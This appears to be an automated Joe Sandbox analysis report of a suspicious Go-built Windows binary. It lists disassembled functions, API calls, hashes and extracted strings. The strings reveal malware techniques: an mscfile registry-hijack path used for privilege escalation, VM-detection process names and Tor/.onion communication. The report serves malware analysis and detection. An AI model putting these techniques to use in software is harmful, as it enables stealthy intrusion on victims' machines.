                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: fprintf
                                                                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                            • API String ID: 383729395-3474627141
                                                                                            • Opcode ID: 734c1bc93119674d019ef67c840bcff02c3ba548de9bf7d395623722429a4793
                                                                                            • Instruction ID: 09e49b7207cbe742dee4ff492e6cb495a2ed55b538b347f1dab7f25565962528
                                                                                            • Opcode Fuzzy Hash: 734c1bc93119674d019ef67c840bcff02c3ba548de9bf7d395623722429a4793
                                                                                            • Instruction Fuzzy Hash: 2AF04C21E0898682E310BB24A9042BDE320EB5A3E0F818A32FF4D57241FF7CF186C310
                                                                                            Function 00007FF7EE4A219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                            • String ID:
                                                                                            • API String ID: 682475483-0
                                                                                            • Opcode ID: 844f6d217ff74ff32d443163d169c904dbc537589d089fe909406bc73ab79a72
                                                                                            • Instruction ID: e7831efc178b7a912b065bbb13bc5baeece3a2defee6fb794b51b76972df9a2c
                                                                                            • Opcode Fuzzy Hash: 844f6d217ff74ff32d443163d169c904dbc537589d089fe909406bc73ab79a72
                                                                                            • Instruction Fuzzy Hash: C8010C35A0960381E655AB11FE44374A220EF49BA0F860833DA0D47B50FFBCB9599226

                                                                                            Execution Graph

                                                                                            Execution Coverage:4.4%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:12
                                                                                            Total number of Limit Nodes:1
                                                                                            execution_graph 840 299e026 841 299e035 840->841 844 299e7c6 841->844 846 299e7e1 844->846 845 299e7ea CreateToolhelp32Snapshot 845->846 847 299e806 Module32First 845->847 846->845 846->847 848 299e03e 847->848 849 299e815 847->849 851 299e485 849->851 852 299e4b0 851->852 853 299e4f9 852->853 854 299e4c1 VirtualAlloc 852->854 853->853 854->853

                                                                                            Executed Functions

                                                                                            Function 00401454 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetNumberFormatW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401554
                                                                                              • Part of subcall function 00401930: __indefinite.LIBCMT ref: 00402B87
                                                                                            • __floor_pentium4.LIBCMT ref: 004014DB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatNumber__floor_pentium4__indefinite
                                                                                            • String ID: E~|x$Qm
                                                                                            • API String ID: 2030598621-2757335022
                                                                                            • Opcode ID: b32e833bb58926868de330e06c19b01d26b5bdae2a7c28d3054e68a455d10f84
                                                                                            • Instruction ID: 73985604538cdd5685153801c214ae0a0d39f512be01b4a662099dd89bdb8629
                                                                                            • Opcode Fuzzy Hash: b32e833bb58926868de330e06c19b01d26b5bdae2a7c28d3054e68a455d10f84
                                                                                            • Instruction Fuzzy Hash: 3731A5B1E043109FC3119F2DDD8550ABBE8FB98754F014A7EF45AAB2F2D63898408BD9
                                                                                            Function 0040124C Relevance: 3.2, APIs: 2, Instructions: 150memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LocalAlloc.KERNELBASE(00000000), ref: 004012B3
                                                                                            • VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 004012CB
                                                                                              • Part of subcall function 00401BCA: __wcstoi64.LIBCMT ref: 00401BD6
                                                                                              • Part of subcall function 0040123E: _strcat.LIBCMT ref: 00401244
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocLocalProtectVirtual__wcstoi64_strcat
                                                                                            • String ID:
                                                                                            • API String ID: 2486670240-0
                                                                                            • Opcode ID: d6dbba6c9f6b0861d33ed659708737630cea1a9671ab7ce7f81f231f642289e2
                                                                                            • Instruction ID: 8be1ec911b5a2543e4fe96f7871ea4dd59ea00270996b7423bd8d5e6e982b0d8
                                                                                            • Opcode Fuzzy Hash: d6dbba6c9f6b0861d33ed659708737630cea1a9671ab7ce7f81f231f642289e2
                                                                                            • Instruction Fuzzy Hash: 3151A271905614ABD751ABA1EC4DAEF3B6CFF15305F008125F509E22B0CB386542CBB8
                                                                                            Function 0299E7C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0299E7EE
                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0299E80E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0299E000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_2_299e000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 3833638111-0
                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction ID: 3ebec6b5c4e2cef199a92337a3e647d8d97059172f6f15263af28ea6756ed454
                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction Fuzzy Hash: 64F096312007156FDB207BFDA88DBAE76ECAF89635F10052AF687914C0DB70E8454A61
                                                                                            Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNELBASE(0081D678,00401449), ref: 00401070
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 5917c715bfe6e1d03dbea019a9f9131d8b002cc3af8c145fa692876eb5b913ec
                                                                                            • Instruction ID: 019890be7eb8b6ef552ab5dc434fb2854a1f395abc86a746e8410f5877666c50
                                                                                            • Opcode Fuzzy Hash: 5917c715bfe6e1d03dbea019a9f9131d8b002cc3af8c145fa692876eb5b913ec
                                                                                            • Instruction Fuzzy Hash: 96F05465698384D8F6008BF0BC21B752329FF60B50F11D407F508CF2F5F2A60990D799
                                                                                            Function 00404E46 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00404E5B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 10892065-0
                                                                                            • Opcode ID: fbb79b3ce6b16800176ca7d6b405fc1c1dd4e1a840c0fe1b0aaad099444b00f5
                                                                                            • Instruction ID: 26c44c399ed0e66b42f290df7f571b8cdaa9e6ead15ce4745b4eb1f55b5a12a5
                                                                                            • Opcode Fuzzy Hash: fbb79b3ce6b16800176ca7d6b405fc1c1dd4e1a840c0fe1b0aaad099444b00f5
                                                                                            • Instruction Fuzzy Hash: 81D05E72954305AADB105FB1AC087A33BDCF784795F148436B91DC6690F674D550C544
                                                                                            Function 0299E485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 13 299e485-299e4bf call 299e798 16 299e50d 13->16 17 299e4c1-299e4f4 VirtualAlloc call 299e512 13->17 16->16 19 299e4f9-299e50b 17->19 19->16
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0299E4D6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0299E000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_2_299e000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction ID: e17333c3d16672ffb06eec398476f3e116f6d5c54ab12b96f445e3620a83d67d
                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction Fuzzy Hash: CB113C79A00208EFDB01DF98C985E99BFF5AF08351F058095F9889B361D371EA90EF81

                                                                                            Non-executed Functions

                                                                                            Function 00433840 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                            • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                            • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                            • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                            • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                            • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                            • %, xrefs: 00433B64
                                                                                            • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                            • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000002.1587040107.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000840000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000C77000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000C7A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CCF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CD3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CEF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CF6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_2_400000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
                                                                                            • API String ID: 0-2845907608
                                                                                            • Opcode ID: 5abccb9955bb7e61ea68e392401cb810dba1d0244b6c3c0f14204fc9a1a2f5da
                                                                                            • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                            • Opcode Fuzzy Hash: 5abccb9955bb7e61ea68e392401cb810dba1d0244b6c3c0f14204fc9a1a2f5da
                                                                                            • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                            Function 00405BF1 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l
                                                                                            • String ID:
                                                                                            • API String ID: 2858943917-0
                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                            • Instruction ID: 69757e266c5be84ff215eaaf3f6b84d50e1e16f6177c8bd8507655aba2af1ece
                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                            • Instruction Fuzzy Hash: 6A117E3200464EBBCF165E84CC41CEF3F22FB19354B188526FA1868170D23AC9B1AF85
                                                                                            Function 00443890 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                            • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                            • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                            • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000002.1587040107.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000840000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000C77000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000C7A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CCF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CD3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CEF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CF6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_2_400000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                                                                                            • API String ID: 0-3530339137
                                                                                            • Opcode ID: 8b027008e4681ae371e7009484516bb6ae8be36b8b546ccf354ab389333accda
                                                                                            • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                            • Opcode Fuzzy Hash: 8b027008e4681ae371e7009484516bb6ae8be36b8b546ccf354ab389333accda
                                                                                            • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A

                                                                                            Execution Graph

                                                                                            Execution Coverage:2.4%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:823
                                                                                            Total number of Limit Nodes:2
                                                                                            execution_graph 2820 140001ac3 2825 140001a70 2820->2825 2821 140001b36 2824 140001ba0 4 API calls 2821->2824 2822 14000199e 2823 140001a0f 2822->2823 2827 1400019e9 VirtualProtect 2822->2827 2826 140001b53 2824->2826 2825->2821 2825->2822 2825->2826 2827->2822 1995 140001ae4 1997 140001a70 1995->1997 1996 140001b36 2003 140001ba0 1996->2003 1997->1996 1998 14000199e 1997->1998 2001 140001b53 1997->2001 1999 140001a0f 1998->1999 2002 1400019e9 VirtualProtect 1998->2002 2002->1998 2006 140001bc2 2003->2006 2004 140001c04 memcpy 2004->2001 2006->2004 2007 140001c45 VirtualQuery 2006->2007 2008 140001cf4 2006->2008 2007->2008 2012 140001c72 2007->2012 2009 140001d23 GetLastError 2008->2009 2011 140001d37 2009->2011 2010 140001ca4 VirtualProtect 2010->2004 2010->2009 2012->2004 2012->2010 2028 140001404 2101 140001394 2028->2101 2030 140001413 2031 140001394 2 API calls 2030->2031 2032 140001422 2031->2032 2033 140001394 2 API calls 2032->2033 2034 140001431 2033->2034 2035 140001394 2 API calls 2034->2035 2036 140001440 2035->2036 2037 140001394 2 API calls 2036->2037 2038 14000144f 2037->2038 2039 140001394 2 API calls 2038->2039 2040 14000145e 2039->2040 2041 140001394 2 API calls 2040->2041 2042 14000146d 2041->2042 2043 140001394 2 API calls 2042->2043 2044 14000147c 2043->2044 2045 140001394 2 API calls 2044->2045 2046 14000148b 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000149a 2047->2048 2049 140001394 2 API calls 2048->2049 2050 1400014a9 2049->2050 2051 140001394 2 API calls 2050->2051 2052 1400014b8 2051->2052 2053 140001394 2 API calls 2052->2053 2054 1400014c7 2053->2054 2055 140001394 2 API calls 2054->2055 2056 1400014d6 2055->2056 2057 1400014e5 2056->2057 2058 140001394 2 API calls 2056->2058 2059 140001394 2 API calls 2057->2059 2058->2057 2060 1400014ef 2059->2060 2061 1400014f4 2060->2061 2062 140001394 2 API calls 2060->2062 2063 140001394 2 API calls 2061->2063 2062->2061 2064 1400014fe 2063->2064 2065 140001503 2064->2065 2066 140001394 2 API calls 2064->2066 2067 140001394 2 API calls 2065->2067 2066->2065 2068 14000150d 2067->2068 2069 140001394 2 API calls 2068->2069 2070 140001512 2069->2070 2071 140001394 2 API calls 2070->2071 2072 140001521 2071->2072 2073 140001394 2 API calls 2072->2073 2074 140001530 2073->2074 2075 140001394 2 API calls 2074->2075 2076 14000153f 2075->2076 2077 140001394 2 API calls 2076->2077 2078 14000154e 2077->2078 2079 140001394 2 API calls 2078->2079 2080 14000155d 2079->2080 2081 140001394 2 API calls 2080->2081 2082 14000156c 2081->2082 2083 140001394 2 API calls 2082->2083 2084 14000157b 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000158a 2085->2086 2087 140001394 2 API calls 2086->2087 2088 140001599 2087->2088 2089 140001394 2 API calls 2088->2089 2090 1400015a8 2089->2090 2091 140001394 2 API calls 2090->2091 2092 1400015b7 2091->2092 2093 140001394 2 API calls 2092->2093 2094 1400015c6 2093->2094 2095 140001394 2 API calls 2094->2095 2096 1400015d5 2095->2096 2097 140001394 2 API calls 2096->2097 2098 1400015e4 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015f3 2099->2100 2102 140005ab0 malloc 2101->2102 2103 1400013b8 2102->2103 2104 1400013c6 NtCloseObjectAuditAlarm 2103->2104 2104->2030 2105 140002104 2106 140002111 EnterCriticalSection 2105->2106 2107 140002218 2105->2107 2108 14000220b LeaveCriticalSection 2106->2108 2112 14000212e 2106->2112 2109 140002272 2107->2109 2110 140002241 DeleteCriticalSection 2107->2110 2108->2107 2110->2109 2111 14000214d TlsGetValue GetLastError 2111->2112 2112->2108 2112->2111 2013 14000216f 2014 140002185 2013->2014 2015 140002178 InitializeCriticalSection 2013->2015 2015->2014 2016 140001a70 2017 14000199e 2016->2017 2021 140001a7d 2016->2021 2018 140001a0f 2017->2018 2019 1400019e9 VirtualProtect 2017->2019 2019->2017 2020 140001b53 2021->2016 2021->2020 2022 140001b36 2021->2022 2023 140001ba0 4 API calls 2022->2023 2023->2020 2828 140002050 2829 14000205e EnterCriticalSection 2828->2829 2830 1400020cf 2828->2830 2831 1400020c2 LeaveCriticalSection 2829->2831 2832 140002079 2829->2832 2831->2830 2832->2831 2833 140001fd0 2834 140001fe4 2833->2834 2835 140002033 2833->2835 2834->2835 2836 140001ffd EnterCriticalSection LeaveCriticalSection 2834->2836 2836->2835 2121 140001ab3 2122 140001a70 2121->2122 2122->2121 2123 140001b36 2122->2123 2124 14000199e 2122->2124 2127 140001b53 2122->2127 2126 140001ba0 4 API calls 2123->2126 2125 140001a0f 2124->2125 2128 1400019e9 VirtualProtect 2124->2128 2126->2127 2128->2124 1985 140001394 1989 140005ab0 1985->1989 1987 1400013b8 1988 1400013c6 NtCloseObjectAuditAlarm 1987->1988 1990 140005ace 1989->1990 1993 140005afb 1989->1993 1990->1987 1991 140005ba3 1992 140005bbf malloc 1991->1992 1994 140005be0 1992->1994 1993->1990 1993->1991 1994->1990 2113 14000219e 2114 140002272 2113->2114 2115 1400021ab EnterCriticalSection 2113->2115 2116 140002265 LeaveCriticalSection 2115->2116 2118 1400021c8 2115->2118 2116->2114 2117 1400021e9 TlsGetValue GetLastError 2117->2118 2118->2116 2118->2117 2024 140001000 2025 14000108b __set_app_type 2024->2025 2026 140001040 2024->2026 2027 1400010b6 2025->2027 2026->2025 2119 140002320 strlen 2120 140002337 2119->2120 2129 140001140 2132 140001160 2129->2132 2131 140001156 2133 1400011b9 2132->2133 2134 14000118b 2132->2134 2135 1400011d3 2133->2135 2136 1400011c7 _amsg_exit 2133->2136 2134->2133 2137 1400011a0 Sleep 2134->2137 2138 140001201 _initterm 2135->2138 